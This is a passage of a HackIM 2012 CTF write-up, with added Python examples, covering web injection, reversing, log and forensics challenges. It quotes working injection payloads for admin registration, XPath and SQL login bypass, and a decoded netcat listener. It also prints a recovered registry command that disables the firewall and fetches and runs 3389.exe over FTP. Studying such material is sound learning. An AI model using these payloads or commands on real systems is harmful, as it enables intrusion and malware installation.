format was similar to what we got earlier in the post-registration page source. So all we had to
do was add admin:yes as per the format. Even this process annoyed me a lot, since I couldn't get
it correct on a single attempt.
So, the correct format was:
username=me.admin&name=admin&password=admin&email=admin%40localhost.com|admin:yes&Submit=Register
And finally I registered myself as the admin, and got the flag.
Flag: b3149ecea4628efd23d2f86e5a723472
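The record format from the debug comment, as an added example (the server-side code is not shown on the page; the positional reader below is an assumption that fits the payload): the email is written into a |-separated line unescaped, so a | inside it shifts every following field, and the injected admin:yes lands in the slot the reader takes as the admin flag.

```python
DELIMITER = "|"


def make_record_vulnerable(username, name, password, email):
    """Write the registration as the debug comment shows it: fields joined
    with '|' and the user-supplied values copied in unescaped."""
    return DELIMITER.join([username, password, name, email, "admin:no", "comment:new user"])


def parse_record(record):
    """Positional reader of the USER DB FILE (assumed; the page does not show
    the server code). Field 4 is the admin flag, so an extra '|' earlier in
    the line shifts the injected admin:yes into that slot."""
    f = record.split(DELIMITER)
    return {"username": f[0], "name": f[2], "email": f[3], "admin": f[4] == "admin:yes"}


def fields_are_safe(*values):
    """The fix: refuse the delimiter (and line breaks) in every user field,
    and never let any user field decide the admin flag."""
    return all(DELIMITER not in v and "\n" not in v and "\r" not in v for v in values)


def register_hardened(username, name, password, email):
    if not fields_are_safe(username, name, password, email):
        raise ValueError("delimiter in user-supplied field")
    return make_record_vulnerable(username, name, password, email)
```

Escaping the delimiter (or using a format with quoting, such as the csv module) is the other half; the structural point is that a privilege flag must come from the server's decision, not from a field a user can push characters into.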
Web Level 4: Can You Get Me all the Data?
Official Hint: if you think you've seen all the data, i'm afraid you're mistaken
Page Source: Nothing Interesting
Description: 2007 && 2002
Analysis: At the beginning of this level I had no idea at all what was really required.
After hovering around the links for a few hard hours, I got a cool link on OWASP:
https://www.owasp.org/index.php/Interpreter_Injection
There were a few interesting attack vectors which I foolishly tried, in vain; had no luck. I read
the description again and understood it was asking to reveal data from the server, and then
realized that I had blindly tried those injection parameters. On my next attempt I went
looking for cheat sheets on various attack parameters. I collected a few of them and studied them.
They were beyond my understanding. Helplessly shouted in the IRC and got some clue, a clue
which again required traversing blindly. Eventually I came across an article,
http://palpapers.plynt.com/issues/2005Jul/xpath-injection/, which described XPath injection in
simple, understandable language, and then a good cheat sheet over here:
http://www.simple-talk.com/dotnet/.net-framework/xpath,-css,-dom-and-selenium-the-rosetta-stone/
I tried those attack vectors, and got the flag unexpectedly with this one:
input='] | /* | /foo[bar='
I completed this level blindly, a bad one.
Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear
Web Level 5:
Official Hint: It’s SQLi
Page Source: Nothing Interesting
Description: Do You Have What IT Takes to Break into the World's Most Secure Login System?
Analysis: The very first thing anyone would try after looking at the page at first sight was the
very common SQL injection (" or 1=1--), and yes, I was on the same side of the coin. As usual I
was wrong again. Assuming it to be a blind SQLi, I looked around www.1337day.com and
www.exploit-db.com in hope of getting some good papers. On the very first link of exploit-db I
got to see a paper on advanced blind SQLi; went through it and there were some attack vectors
against web firewalls. With positive hope I tried, and on the second attempt, using '<>'1 as the
username and password, made it to the flag.
Flag: 47c1b025fa18ea96c33fbb6718688c0f
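Why '<>'1 gets through where the textbook payload did not, as an added example run against SQLite (the page does not say which database backed the challenge, and the keyword blocklist below is a toy standing in for the unknown "web firewall", not its real rules): the injected value turns username='<input>' into username=''<>'1', which SQLite evaluates left to right as (username='') <> '1', true for every row, using none of the tokens a keyword filter looks for. Other engines parse that chain differently, which is why such bypasses are engine-specific. The parameterised query receives the same strings as data and matches nothing.

```python
import sqlite3


def make_db():
    """Constructed users table; not the challenge's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    return db


# Toy keyword blocklist standing in for the unknown "web firewall": it stops
# the textbook ' or 1=1-- but has no rule that matches '<>'1.
BLOCKED = (" or ", "--", "#", "/*", "union", "=")


def waf_allows(value):
    lowered = value.lower()
    return not any(token in lowered for token in BLOCKED)


def injected_query(username, password):
    """The SQL the vulnerable handler actually runs (string concatenation)."""
    return "SELECT username FROM users WHERE username='%s' AND password='%s'" % (username, password)


def login_vulnerable(db, username, password, use_waf=True):
    """The login succeeds if the concatenated WHERE clause matches any row."""
    if use_waf and not (waf_allows(username) and waf_allows(password)):
        return False
    return db.execute(injected_query(username, password)).fetchone() is not None


def login_hardened(db, username, password):
    """Parameterised query: the input is compared as data, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None
```

The blocklist is there to make the point the author's paper made: filtering syntax is a race the defender loses, and the parameterised form wins it without a filter at all.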
Reverse Engineering Levels
Reverse Engineering 1: Basic Test
Official Hint: N/A
Page Source: <!-- md5sum: 9d428bdcb07127ff4358f7d487445470 -->
Description: justdoit.exe
Analysis: The given binary seemed suspicious, so before executing it I decided to analyze it
and verify that it was safe to execute. I dumped the binary into a hex editor and observed it. The
headers showed that it was UPX packed. I unpacked it using "Universal Extractor" and went
through it again; no conclusion. Finally I executed it inside the VM and analyzed its behavior.
At first I couldn't get anything from it; I executed it a few more times and saw the automation
done by the exe. Then I went to Google and searched for the string "keyboard automation", and
the first result showed AutoHotKey. Eventually I ended up looking for Exe2Ahk at
http://www.autohotkey.com/download/Exe2Ahk.exe
After successful decompilation, I found the flag in plain text.
Flag: We could talk all day about what AutoHotKey can do for an online poker player
Reverse Engineering 2: Ask nicely, it will give you what you want
Official Hint: Take another path.. in general look for interesting code blocks & execute them..
code can be anywhere in the PE, even in data | Resource? No Resource
Page Source: <!-- md5sum: c786287c7825784a85413695a9e319fc -->
Description: HackIM.exe
Analysis: I consider this the most insane level in the whole CTF competition. I spent nearly
two hacking days getting past it. To understand the binary, I downloaded nearly all the
tools found on Google having the string "PE", went through various articles on reversing PE files and,
worse than that, shifted between 3 different debuggers one by one. Ultimately, after tracing the
flow of the program several times in OllyDbg, the following steps led to the flag:
1. As the hint was suggesting "No Resource", I loaded the PE into Resource Hacker to see
what exactly it meant. I encountered the following error.
So it was clear from this error that there was something wrong with the resource section.
2. I turned to OllyDbg, loaded the PE and went to the memory window (ALT+M).
3. At offset 0040C000 there was the .rsrc (resource) section. I changed the access of the section
from Read to Full Access.
4. Tried running the program but couldn't get anything desired. Popped over to the hint again,
and there it was asking to execute the resource section.
5. So now it was time to place a jump instruction somewhere so as to execute the resource
section. Came back to the CPU window (ALT+C).
6. Just below the program entry point, at offset 00401273, there was a JMP instruction.
7. So all I had to do was point the jump at the resource section, which was at address
0040C000.
8. And finally, running the program, I got the flag in the message box.
Flag: AreYouHappyNow?
Reverse Engineering 3: null Mobile Android App
Official Hint: N/A
Page Source: <!-- md5sum: fd81ba87c0edc1f37250e680a49260d8 -->
Description: We’re proud to announce the null Mobile Android App Project; however the
application is currently in Beta Phase and requires lot of attention from the testers. In keeping
with the spirit of HackIM we've hidden a Flag inside. Your task is to find the Flag.
Analysis: I didn't have as hard a time with this one as with the previous ones. I unpacked the apk file with
WinRAR and went through the contents. Inside the folder res>raw there were two files, code.js and
junk.php. The JavaScript inside code.js was in an unformatted state. I formatted it using
http://www.jsbeautifier.org and went through it, but couldn't get anything interesting. Next I opened
the junk.php file in UltraEdit and after careful observation, there at line 72, I got to see a
packed JavaScript function. Finally an online tool at http://www.strictly-software.com/unpacker
helped me to unpack the JavaScript function, revealing the flag inside it.
Flag: Do not let what you cannot do interfere with what you can do.
Reverse Engineering 4
Official Hint: we’ve updated the binary with hints, request all to download again to proceed
Page Source:
<!-- md5sum: 7c87b2bfe4e02dbb32e2c3067cb93692 -->
<!-- <center><h3><a href="data/script">script</a></h3></center>
<!-- md5sum: 849f2d8c6e22604cba8fe4904803de10 -->
Description: REL4 UPDATE: WE have updated the binary with some hints inbuilt, Request all
to download new RE binary to proceed.
Analysis: My first attempt with the given file was to analyze its type. I used the file identifier
called TrID, also available online at http://mark0.net/onlinetrid.aspx. The result
showed that it was an ELF binary, so I cross-verified it on the terminal:
It showed that the binary was stripped. I tried executing it and was entertained with the
following error.
I tried the strace and ltrace commands but couldn't learn much from those outputs.
The error indicated something about a time machine, so I turned to Google and looked for
anything interesting on time machines, however I couldn't find anything to help.
The next thing I did was to change the system date to some earlier year; I changed it to the year 2000.
Tried executing the binary again, and voila, there was no error, but no flag either. Tried giving
some parameters, but that didn't help anything. Next I opened a new terminal and tried
looking into the currently running processes using the command ps -aux and got a long list. It was
difficult to figure out, so again I tried filtering it using the command ps -aux | grep script2 and
whoa, unexpectedly got to see a shell script. Went through it, and there our flag was in
plaintext.
Flag: Nature has neither kernel nor shell; she is everything at once
Reverse Engineering 5: Got Dumped :(
Official Hint:
Page Source: <!-- md5sum: 043e4cc85c519723fad18dce7502371c -->
Description: lol.rar
Analysis: This challenge was about crash dump analysis. I opened it in a hex editor, went
through a few lines and got the idea that it was a Windows crash dump. Next I installed WinDbg
with proper symbol configuration and loaded the dump into it. I was unaware of any such
analysis and went through a few links on Google. Got some good information and a few cheat sheets.
Ultimately the following steps helped me to understand the dump.
1. First we had to recognize the file that caused the crash. The command !analyze -v showed
that stub.exe caused the crash.
2. Next we had to extract stub.exe from the dump to analyze it. For this there is SOS,
which is used for .NET debugging (to dump DLLs and EXEs).
3. .load clr10sos.dll
4. !sam folder_location
5. Now we had stub.exe. Next I loaded stub.exe into OllyDbg. Stepping into the instructions,
I realized that the jump was passing to the crash portion of the assembly. Tried to
bypass it by jumping to the MessageBox function. I got the message box, but there was
no flag in it. Again went back to WinDbg and checked for the PID, since there was a
GetProcessID function in the assembly. I got the PID as 0xA60, then I patched
GetProcessID to return 0xA60 and finally got the flag.
Flag: TheLastSamurai
Log Analysis
Log Analysis 1: Basic
Official Hint: N/A
Page Source: <!-- md5sum: 1e2612e8ff3d4651c7d5fc67f2797906 -->
Description: report
Analysis: In this challenge the log was not too large but took a long time to understand. Every
line had a cool piece of information. On carefully observing the lines, I found
something very interesting on line number 31:
+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is enabled: /challenge/logically_insane/
Checked into it and wow, found two files, but at the very next moment realized that the game was
still on. It said "Ask the proper question to get the proper answer". Went to the page source and
got a bit closer to the flag; there was a hint given in a comment:
<!-- askmelater.asp?question=? -->
And to my surprise, with my very first guess I got the flag. HAPPY!!!
The final URL was:
http://nullcon.net/challenge/logically_insane/askmelater.asp?question=flag
Flag: 6bb61e3b7bce0931da574d19d1d82c88
Log Analysis 2: Mystery Password
Official Hint: N/A
Page Source: <!-- md5sum: 6eebd22df057377a436dad2d97fad8b6 -->
Description: log3.pcap
Analysis: There wasn't much to this challenge. The log was unexpectedly small and anyone could
solve it within a few minutes. I opened the log in Wireshark. The easiest way to learn the
log was to see the TCP stream: right click in the packet list > Follow TCP Stream popped up
the TCP stream window. The very last line of the stream content revealed the password, and with the
next few attempts I got the flag.
Flag: ..Supp@..adm1n
Log Analysis 3: Clever Intruder
Official Hint: N/A
Page Source :<!-- md5sum: 396df3308184a77890cb708f05915f29 -->
Description: access.rar
Analysis: A 25MB log with approx. 1 lakh (100,000) lines. It seemed nearly impossible to analyze, so
I thought for a while and looked around Google for some good log explorer to make the task
easier. Got a few, but they were all useless; I wasted my time and came back to my old favorite
UltraEdit and gave a quick glance through the lines. Learnt from the logs that:
- Logs were generated from different scanners.
- There was variation in IP.
- Scanning was performed on the same date over a fixed period of uninterrupted time.
- The HTTP status code for most of the requests was 404.
Hence the last finding proved to be essential, assuming we couldn't find anything interesting
in a "Page Not Found" error. I tried my level best to separate all those logs into different tabs in
UltraEdit. This was really a very hectic job; had I had some more knowledge it wouldn't have been tough to
get past this hurdle easily. This level really made me realize how poor I am. After long hours of
assumed work, I eventually came across the line with an encoded base64 string
"bmMgLWwgLXAgNjY2Ng==" and on decoding got "nc -l -p 6666". In the original log, this
was on line number 37409 (UltraEdit).
Flag:
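The manual filtering described above, as an added Python example over constructed Apache combined-format lines (not lines from access.rar): drop the 404 responses, URL-decode the request path, and try to decode any base64-looking run that survives the length and padding checks. The regexp is only a heuristic, since path characters are valid base64 characters, so the decode-to-printable-ASCII test is what keeps the false positives down.

```python
import base64
import re
from urllib.parse import unquote

# Constructed log lines; the third carries the base64 string quoted on the page.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2012:10:01:02 +0530] "GET /admin/ HTTP/1.1" 404 512 "-" "Nikto/2.1.4"
10.0.0.5 - - [10/Jan/2012:10:01:03 +0530] "GET /phpmyadmin/ HTTP/1.1" 404 512 "-" "Nikto/2.1.4"
10.0.0.9 - - [10/Jan/2012:10:15:44 +0530] "GET /tools/run.php?cmd=echo%20bmMgLWwgLXAgNjY2Ng==|base64%20-d|sh HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2012:10:15:50 +0530] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
B64_RE = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")


def parse_line(line):
    """Combined-format access log line -> dict of the fields we need, or None."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def decoded_base64_tokens(text):
    """Yield (token, decoded) for base64-looking runs that decode to printable ASCII."""
    for token in B64_RE.findall(text):
        if len(token) % 4:
            continue
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if raw and all(32 <= b < 127 for b in raw):
            yield token, raw.decode("ascii")


def suspicious_requests(log_text, skip_statuses=("404",)):
    """The author's two filters in code: ignore the scanner noise (404s) and
    report every remaining request whose decoded path hides base64 text."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["status"] in skip_statuses:
            continue
        for token, decoded in decoded_base64_tokens(unquote(rec["path"])):
            hits.append({"ip": rec["ip"], "status": rec["status"],
                         "encoded": token, "decoded": decoded})
    return hits
```

Run it over the real file with open(path).read(); the 404 filter removes the scanner traffic first, which is the same narrowing the author did by hand in UltraEdit.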
Log Analysis 4:
Official Hint: Exploited!!!
Page Source: <!-- md5sum: afcc45de48c327847c507c68ad7e6bf4 Expected Format: CVE-XXXX-XXXX -->
Description: CVE of the Exploit is the Flag
Analysis: This challenge was all about finding the CVE exhibited by the content in the log.
As mentioned, it was a Burp Suite log. To make viewing easier, I renamed the log file to
log.xml and opened it in a web browser. Again this log had many 404 Not Found requests. After
going through the first few lines, I came across the log entries for TikiWiki; there were other entries
for Joomla, but I preferred to go sequentially. Since I am not good with exploit identification, I browsed to
http://nvd.nist.gov/ and searched CVEs for TikiWiki. Most of the results returned CVEs related to
XSS, but in our log I couldn't see any such XSS thing, so went with the exceptions, and eventually
got the flag. Honestly I couldn't understand which line in the log referred to the CVE, but I had
an answer for the question.
Flag: CVE-2005-1921
Log Analysis 5: Waat Laga Server
Official Hint:
Page Source: <!-- md5sum: c641fa00c0a84fd8fd954b3e75d5d6c8 -->
Description: dump.rar
Analysis: Again 95 MB of logs. Loaded it into Wireshark and tried for a few minutes to look into it;
looked at the first few lines and the last few lines and honestly didn't understand, as it was really difficult to
browse through each line one by one. Tried to find some alternate way and couldn't learn much;
all I got was some bogus ads for shareware log explorers asking for $$$. Came back to the
description again and noticed that for the 3rd flag a name was required. Googled for the string "Local
Privilege Escalation Exploit" and the search returned some exploit-db papers. The interesting
thing I noticed was that the CVE might help me with author identification. The next challenge was to
look for the CVE in such a huge log. Used the cat command, but that didn't help; again tried a few
more of them but there was no result, and eventually ended up with the strings command to get the
CVE:
Also found the paper at http://www.exploit-db.com/exploits/9479/. Finally got my first flag for
the challenge: Tavis Ormandy Julien Tinnes. I studied the exploit and came to understand from
the title that it was a local root exploit.
Now expectations were high with the strings command and I extracted all the strings from the dump
to a plain text file. The command I used was:
strings dump.pcapng > dump.txt
By this time I had a stripped version of the log with the more important things.
Next I tried to look for the last flag, which was the root password, since it was a local root
exploit. I looked for the pattern root inside dump.txt and got the hash for root.
Next I used John the Ripper to crack the hash and got my 2nd flag: zuzana
On to the hunt for the 3rd flag, it asked to look for the vulnerable parameter. Opened dump.txt and saw
that there were many 404s, so again it was time to eliminate those and consider the successful
responses. I tried a few variations and again stripped down dump.txt to ok.txt; now we had
much smaller information to analyze.
Went through the file ok.txt and noticed that the parameters page, title and id
were common to all the GET requests. Hence with variation of parameters I got the flag
successfully. I had to spend too much time with all those iterations and variations; indeed it was
one of the levels on which I spent much more time analyzing to get the flag.
Flag:
=====================================================================
Forensics Levels
Forensics Level 1: Tum Agar Dhyan Se Baat Meri Suno
Official Hint:
Page Source:<!-- md5sum: 1478ae7166bf5ab5d4f4a4136b819319 -->
Description:While conducting the raid on a suspect the police found the system containing no
suspicious information in the form of a code. While comparing various files they came up with a
suspicious sound file and feel that the code is hidden inside the same.You are asked to find out
that code if hidden in the file.
Analysis: This was one of the coolest challenges in the HackIM 2012 CTF. I listened to the audio
and observed that there was distortion at certain places, and also heard that the distortion
appeared on a single channel. I had earlier used the audio editor software "GoldWave". I opened the
audio in GoldWave and separated those distortions from the main stream; since the distortion
was on a single channel (right) the task became easier. After listening to the distortion, it didn't
give up any meaning, so I thought of applying some sound effect, and on the very first attempt,
applying the reverse sound effect, I got the flag.
Flag: 12344346765
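The GoldWave steps in code, as an added Python example (not the author's tooling, and the challenge's sound file is not reproduced): read a 16-bit stereo WAV, keep the right channel, reverse it, and write the result as mono so it can be listened to. stereo_wav builds a constructed input so the whole thing runs offline.

```python
import io
import struct
import wave


def right_channel_reversed(wav_bytes):
    """Take the right channel of a 16-bit stereo WAV and return
    (sample_rate, samples reversed in time)."""
    with wave.open(io.BytesIO(wav_bytes), "rb") as w:
        if w.getnchannels() != 2 or w.getsampwidth() != 2:
            raise ValueError("expected 16-bit stereo PCM")
        rate = w.getframerate()
        frames = w.readframes(w.getnframes())
    samples = struct.unpack("<%dh" % (len(frames) // 2), frames)
    right = samples[1::2]  # frames are interleaved L, R, L, R, ...
    return rate, right[::-1]


def mono_wav(rate, samples):
    """Write samples as a 16-bit mono WAV (bytes), e.g. to play the result."""
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(struct.pack("<%dh" % len(samples), *samples))
    return buf.getvalue()


def stereo_wav(rate, left, right):
    """Constructed test input: interleave two channels into a 16-bit stereo WAV."""
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(2)
        w.setsampwidth(2)
        w.setframerate(rate)
        interleaved = [s for pair in zip(left, right) for s in pair]
        w.writeframes(struct.pack("<%dh" % len(interleaved), *interleaved))
    return buf.getvalue()
```

For a real file, pass open(path, "rb").read() to right_channel_reversed and write mono_wav(...) to disk; isolating the distorted stretches is then a matter of slicing the sample tuple by time (index = seconds * rate).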
Forensics Level 2: Andar Ch0r
Official Hint: A night with MS Office
Page Source :<!-- md5sum: 74a967082a6c79757cf56cb29f70e8d9 -->
Description: company Mil Baat Ke Khao Ltd suspects that one of its employees is sending the
internal codes secretly outside the organization. The company sniffed the data being sent and
reconstructed it to find that a word document was being sent. The company strongly suspects that
there is some hidden passport code in the document. You as a forensic investigator are provided
with the copy of that file and are required to find out the hidden code. The code has to be in
whole number.
Analysis: This challenge was full of twists; I enjoyed solving it. I opened the given Word
document and saw some numeric digits; they were some hex values, I converted them into ASCII
and was made a fool of. After a while I had doubts about the file and tried to confirm it using TrID:
http://mark0.net/onlinetrid.aspx. The result showed the possibility of the file being an Excel
document. I renamed the file to flag.xls and opened it in Excel. Cool, I was on the right path, but now I
had no idea what to do. Next I opened the file in Notepad and went through the lines;
somewhere near the end I saw some plain text "Hey Good Job done....." and just below there
were "Sheet1" and "Sheet2", but I couldn't remember seeing any Sheet2 in flag.xls. So I got the
idea that it was hidden. It had been ages since I had worked on any Excel sheet, so I had really
forgotten how to hide Excel sheets. Googled, and got a link:
http://www.howtogeek.com/howto/14160/hide-and-unhide-worksheets-and-workbooks-in-excel-2007-2010/
So now Sheet2 was visible, but I was still far away from my flag. Again followed the link
where it asked to use the VB Editor (ALT+F11) to unhide the super hidden worksheet.
Saved it, and finally Sheet3 was revealed with the flag in it.
Flag: 6924289
Forensics Level 3: Not Guilty!
Official Hint:
Page Source :<!-- md5sum: 66666e32a8296f3073619c1dea43d9bf -->
Description: An employee was suspected of using some malicious files. The employee asserts
that he is not guilty because he never used any program except Microsoft Word and Excel. While
conducting the analysis nothing was found in the registry suggesting that something ran
automatically. All locations that can run programs automatically were examined and nothing
malicious was found. You as an investigator are provided with a piece of a hive to carve out whether
anything was deleted from the hive, and provide the exact "Value", "value type" and "data"
deleted so that the employee gets justice.
Analysis: This level was all about registry recovery. I had never encountered such an incident and,
to understand it, went through several forensics articles on registry recovery. Initially I downloaded
a Windows binary of a tool called Yet Another Registry Utility (YARU). Played with it for some
time and realized that it wouldn't help me get anywhere near the flag. Quit and went
through a few more manuals. Eventually came across a tool called "reglookup-recover". It was
open source; installed it on Ubuntu and went through the instructions. After this it wasn't much
tougher to get the flag.
Came back to the description and cross-checked the values obtained with the result, ending up
solving this level.
Flag:
Value: Shell
Value Type: REG_SZ
Data: c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q
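What the recovered value does, as an added example (not part of the writeup): the data is a cmd.exe one-liner that stops the SharedAccess service (Windows Firewall / Internet Connection Sharing), echoes an FTP script line by line into cmd.txt, runs it with ftp -s: to fetch 3389.exe, executes it, and deletes the script. The function below replays the redirections so the dropped script can be read as the attacker wrote it, which is the artefact an incident responder wants next (the FTP host, the account used, the file fetched).

```python
COMMAND = (  # the recovered Shell value's data as given on the page
    r"c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt"
    "&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt"
    "&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q"
)


def reconstruct(command):
    """Split a `cmd.exe /c` one-liner on '&' and replay the echo redirections.
    Returns ({filename: [lines written]}, [the other commands, in order])."""
    _, _, body = command.partition(" /c ")
    files, actions = {}, []
    for segment in (s.strip() for s in body.split("&")):
        if segment.startswith("echo ") and ">" in segment:
            text, _, target = segment[5:].partition(">")
            append = target.startswith(">")   # '>>' appends, '>' truncates
            name = target.lstrip(">").strip()
            if not append:
                files[name] = []
            files.setdefault(name, []).append(text.strip())
        else:
            actions.append(segment)
    return files, actions
```

The reconstructed cmd.txt reads as an FTP session: open host, user feng, password xxx, binary mode, get 3389.exe, bye. Those six lines, plus the host name, are what goes into the indicator list; the `&` splitting is simplistic (it ignores `&&` and quoting) but sufficient for one-liners of this shape.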
Forensics Level 4: Intriguing MBR
Official Hint: Sometimes things spill over
Page Source: <!--
<form id="flevel-4" name="flevel-4" method="post" action="flevel-4-proc.asp"
onsubmit="return validate_form(this);">
-->
Description: A suspected drive was found in bad shape. The data extraction was almost
impossible and the final copy obtained carried only few bytes. The bytes belonged to the initial
sectors and wherever the system could not read the space was filled with 0x00 so as to keep the
offset of the data obtained intact. The initial sector displayed a messy MBR data.
As a forensic investigator you are required to find the following information:
1) The number of partitions in the damaged drives
2) The start and end LBA for each partition
3) The Start and end of unpartitioned space between two clusters
The Drive showed to be a SATA drive with 512 bytes of LBA
Analysis: Yet another level that kept me away from doing anything. Merely a 20KB file, but it may
require 20 hours for a newbie like me to understand it. Started with Google on partition
forensics and ended up with the GUID partition table on Wikipedia; a long story, I would probably
speak about it some time later (Evil Mind).
So the first thing that we required for this challenge was some boot record parser. I got one at
http://www.garykessler.net/software/index.html. The package contained 5 Perl scripts; I extracted
it to a folder.
1. I parsed the GUID Partition Table (GPT) header of the file image.dd using GPTparser.pl
Result of parsing:
2. Coming back to Wikipedia, there was a header format for LBA 1:
3. So comparing offset 072-079 from image.dd with the one in the table below, we can
conclude that there are 9 partitions (2 primary copies as mentioned, and 7 between 72-79).
4. Also it had been mentioned in the description that the LBA size was 512 bytes, and in
our image.dd we can observe from the result of parsing that the partition table starts
at offset 80. Hence the next LBA will be at (512+80)=592.
5. Now it was time for some hex editing. I opened image.dd and traversed to position
592 (250h). Since we had concluded in our earlier steps that there were 9 partitions, we
had to edit the location from 00 to 09.
6. Now again we had to parse the modified image.dd.
7. As in step 1, and we got all our 9 partitions.
8. Now the next step was to observe the GUID from the result and match it with the table
given on Wikipedia to find out the partition type.
9. Finally the LBAs thus obtained were not arranged accordingly, and we had to arrange them in
ascending order so as to obtain the flag.
Flag:
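The procedure in steps 1-9 amounts to: read the GPT header at LBA 1, read the partition entry array it points to, decode each entry, sort by starting LBA and compute the holes. Two fields are worth pinning down against the GPT specification: the 8 bytes at header offset 72-79 are the starting LBA of the partition entry array (normally 2), and the 4 bytes at offset 80-83 are the number of entries; that count sits at file offset 512 + 80 = 592 (0x250), which is the byte the author patched. The following is an added Python example, not part of the writeup and not Gary Kessler's scripts; it builds a small constructed image (not the challenge's image.dd) with the entry count zeroed, and instead of patching the count it scans the entry array up to the first usable LBA, which the header also records.

```python
import struct
import uuid
import zlib

SECTOR = 512
GPT_SIGNATURE = b"EFI PART"
UNUSED_TYPE = "00000000-0000-0000-0000-000000000000"
PARTITION_TYPES = {  # a few well-known type GUIDs, instead of matching by hand
    "c12a7328-f81f-11d2-ba4b-00a0c93ec93b": "EFI System",
    "ebd0a0a2-b9e5-4433-87c0-68b6b72699c7": "Microsoft basic data",
    "0fc63daf-8483-4772-8e79-3d69d8477de4": "Linux filesystem",
}


def parse_gpt_header(image):
    """Decode the primary GPT header at LBA 1 (byte 512) and check its CRC32."""
    hdr = image[SECTOR:SECTOR + 92]
    if hdr[:8] != GPT_SIGNATURE:
        raise ValueError("no GPT signature at LBA 1")
    (_rev, header_size, header_crc, _res, _cur, _backup,
     first_usable, last_usable) = struct.unpack_from("<IIIIQQQQ", hdr, 8)
    entries_lba, num_entries, entry_size, _ecrc = struct.unpack_from("<QIII", hdr, 72)
    raw = bytearray(image[SECTOR:SECTOR + header_size])
    raw[16:20] = b"\0\0\0\0"  # the stored CRC covers the header with this field zeroed
    return {
        "disk_guid": str(uuid.UUID(bytes_le=hdr[56:72])),
        "first_usable_lba": first_usable, "last_usable_lba": last_usable,
        "entries_lba": entries_lba, "num_entries": num_entries,
        "entry_size": entry_size, "header_crc_ok": zlib.crc32(bytes(raw)) == header_crc,
    }


def parse_partition_entries(image, hdr):
    """Decode the entry array; returns the used entries sorted by first LBA."""
    count, size = hdr["num_entries"], hdr["entry_size"]
    if count == 0:
        # Zeroed/damaged count: the array occupies the sectors from its start
        # LBA up to the first usable LBA, so scan that whole region instead.
        count = (hdr["first_usable_lba"] - hdr["entries_lba"]) * SECTOR // size
    parts = []
    for i in range(count):
        off = hdr["entries_lba"] * SECTOR + i * size
        entry = image[off:off + size]
        if len(entry) < size:
            break  # copy truncated (the challenge file held only a few sectors)
        type_guid = str(uuid.UUID(bytes_le=entry[0:16]))
        if type_guid == UNUSED_TYPE:
            continue
        first_lba, last_lba = struct.unpack_from("<QQ", entry, 32)
        parts.append({
            "index": i, "type": PARTITION_TYPES.get(type_guid, type_guid),
            "guid": str(uuid.UUID(bytes_le=entry[16:32])),
            "first_lba": first_lba, "last_lba": last_lba,
            "name": entry[56:size].decode("utf-16-le", "replace").split("\0", 1)[0],
        })
    return sorted(parts, key=lambda p: p["first_lba"])


def unpartitioned_gaps(parts, first_usable, last_usable):
    """(start, end) LBA ranges inside the usable area that no partition covers."""
    gaps, cursor = [], first_usable
    for p in parts:  # parts is sorted by first_lba
        if p["first_lba"] > cursor:
            gaps.append((cursor, p["first_lba"] - 1))
        cursor = max(cursor, p["last_lba"] + 1)
    if cursor <= last_usable:
        gaps.append((cursor, last_usable))
    return gaps


def build_test_image(zero_entry_count=True):
    """Constructed 3-partition image (not the challenge's image.dd): blank
    protective MBR at LBA 0, header at LBA 1, 128 entries at LBA 2..33. With
    zero_entry_count the header's count is wiped like the damaged drive,
    which also breaks the header CRC."""
    layout = [  # deliberately out of LBA order, with a hole before "rootfs"
        ("c12a7328-f81f-11d2-ba4b-00a0c93ec93b", 2048, 4095, "EFI"),
        ("0fc63daf-8483-4772-8e79-3d69d8477de4", 8192, 20479, "rootfs"),
        ("ebd0a0a2-b9e5-4433-87c0-68b6b72699c7", 4096, 6143, "data"),
    ]
    entries = bytearray(128 * 128)
    for i, (type_guid, first, last, name) in enumerate(layout):
        entries[i * 128:(i + 1) * 128] = (
            uuid.UUID(type_guid).bytes_le
            + uuid.uuid5(uuid.NAMESPACE_DNS, name).bytes_le
            + struct.pack("<QQQ", first, last, 0)
            + name.encode("utf-16-le").ljust(72, b"\0"))
    hdr = bytearray(92)
    hdr[0:8] = GPT_SIGNATURE
    struct.pack_into("<IIIIQQQQ", hdr, 8, 0x00010000, 92, 0, 0, 1, 65535, 34, 65502)
    hdr[56:72] = uuid.UUID("12345678-1234-5678-1234-567812345678").bytes_le
    struct.pack_into("<QIII", hdr, 72, 2, 128, 128, zlib.crc32(bytes(entries)))
    struct.pack_into("<I", hdr, 16, zlib.crc32(bytes(hdr)))
    if zero_entry_count:
        struct.pack_into("<I", hdr, 80, 0)
    return bytes(SECTOR) + bytes(hdr).ljust(SECTOR, b"\0") + bytes(entries)
```

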